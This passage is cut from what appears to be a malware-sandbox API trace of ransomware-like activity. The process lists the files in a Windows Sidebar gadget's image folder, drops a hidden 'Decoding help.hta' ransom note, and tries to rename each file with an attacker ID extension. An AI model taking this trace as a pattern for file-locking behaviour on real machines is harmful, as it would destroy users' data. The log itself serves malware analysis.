out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0060.289] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 71 [0060.289] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" [0060.289] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\decoding help.hta")) returned 0xffffffff [0060.289] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x698 [0061.524] WriteFile (in: hFile=0x698, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2ba2fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2ba2fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.525] CloseHandle (hObject=0x698) returned 1 [0061.525] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.525] lstrcmpiW (lpString1="Decoding help.hta", lpString2="16-on-black.gif") returned 1 [0061.525] lstrlenW (lpString="16-on-black.gif") returned 15 [0061.525] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0061.525] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 71 [0061.525] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="16-on-black.gif" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif" [0061.525] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif" [0061.526] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif.[ID]g9uZrLhJaygpwRm1[ID]" [0061.526] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\16-on-black.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\16-on-black.gif.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.526] FindNextFileW (in: hFindFile=0x245589a8, lpFindFileData=0x2ba2fd30 | out: lpFindFileData=0x2ba2fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f36d12, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84f36d12, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x3ce28b2b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x125, dwReserved0=0x0, dwReserved1=0x0, cFileName="buttonDown_Off.png", cAlternateFileName="")) returned 1 [0061.526] lstrcpyW (in: lpString1=0x251f7c18, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0061.526] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 71 [0061.526] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" [0061.526] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\decoding help.hta")) returned 0x1 [0061.526] lstrcmpiW (lpString1="Decoding help.hta", lpString2="buttonDown_Off.png") returned 1 [0061.526] lstrlenW (lpString="buttonDown_Off.png") returned 18 [0061.526] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0061.526] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 71 [0061.526] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="buttonDown_Off.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png" [0061.526] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png" [0061.526] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.526] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_off.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_off.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.526] FindNextFileW (in: hFindFile=0x245589a8, lpFindFileData=0x2ba2fd30 | out: lpFindFileData=0x2ba2fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f36d12, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84f36d12, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x3ce28b2b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="buttonDown_On.png", cAlternateFileName="")) returned 1 [0061.526] lstrcpyW (in: lpString1=0x251f7c18, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0061.526] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 71 [0061.527] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" [0061.527] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\decoding help.hta")) returned 0x1 [0061.527] lstrcmpiW (lpString1="Decoding help.hta", lpString2="buttonDown_On.png") returned 1 [0061.527] lstrlenW (lpString="buttonDown_On.png") returned 17 [0061.527] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0061.527] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 71 [0061.527] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="buttonDown_On.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png" [0061.527] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png" [0061.527] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_on.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_on.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.527] FindNextFileW (in: hFindFile=0x245589a8, lpFindFileData=0x2ba2fd30 | out: lpFindFileData=0x2ba2fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f10bb5, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84f10bb5, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x3ce4ec89, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x118, dwReserved0=0x0, dwReserved1=0x0, cFileName="buttonUp_Off.png", cAlternateFileName="")) returned 1 [0061.527] lstrcpyW (in: lpString1=0x251f7c18, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0061.527] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 71 [0061.527] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" [0061.527] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\decoding help.hta")) returned 0x1 [0061.527] lstrcmpiW (lpString1="Decoding help.hta", lpString2="buttonUp_Off.png") returned 1 [0061.527] lstrlenW (lpString="buttonUp_Off.png") returned 16 [0061.527] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0061.527] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 71 [0061.527] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="buttonUp_Off.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png" [0061.527] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png" [0061.528] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_off.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_off.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.528] FindNextFileW (in: hFindFile=0x245589a8, lpFindFileData=0x2ba2fd30 | out: lpFindFileData=0x2ba2fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f10bb5, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84f10bb5, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x3ce4ec89, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="buttonUp_On.png", cAlternateFileName="")) returned 1 [0061.528] lstrcpyW (in: lpString1=0x251f7c18, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0061.528] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 71 [0061.528] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" [0061.528] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\decoding help.hta")) returned 0x1 [0061.528] lstrcmpiW (lpString1="Decoding help.hta", lpString2="buttonUp_On.png") returned 1 [0061.528] lstrlenW (lpString="buttonUp_On.png") returned 15 [0061.528] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0061.528] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 71 [0061.528] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="buttonUp_On.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png" [0061.528] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png" [0061.528] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_on.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_on.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.528] FindNextFileW (in: hFindFile=0x245589a8, lpFindFileData=0x2ba2fd30 | out: lpFindFileData=0x2ba2fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f5ce6f, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84f5ce6f, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x3ce74de7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x112b, dwReserved0=0x0, dwReserved1=0x0, cFileName="flyoutBack.png", cAlternateFileName="")) returned 1 [0061.528] lstrcpyW (in: lpString1=0x251f7c18, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0061.528] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 71 [0061.528] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" [0061.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\decoding help.hta")) returned 0x1 [0061.529] lstrcmpiW (lpString1="Decoding help.hta", lpString2="flyoutBack.png") returned -1 [0061.529] lstrlenW (lpString="flyoutBack.png") returned 14 [0061.529] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0061.529] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 71 [0061.529] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\", lpString2="flyoutBack.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png" [0061.529] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png" [0061.529] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.529] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\flyoutback.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\flyoutback.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.529] FindNextFileW (in: hFindFile=0x245589a8, lpFindFileData=0x2ba2fd30 | out: lpFindFileData=0x2ba2fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84e78641, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84e78641, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x3ce74de7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0x0, dwReserved1=0x0, cFileName="item_hover_docked.png", cAlternateFileName="")) returned 1 [0061.529] lstrcpyW (in: lpString1=0x251f7c18, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0061.529] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned 71 [0061.529] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows 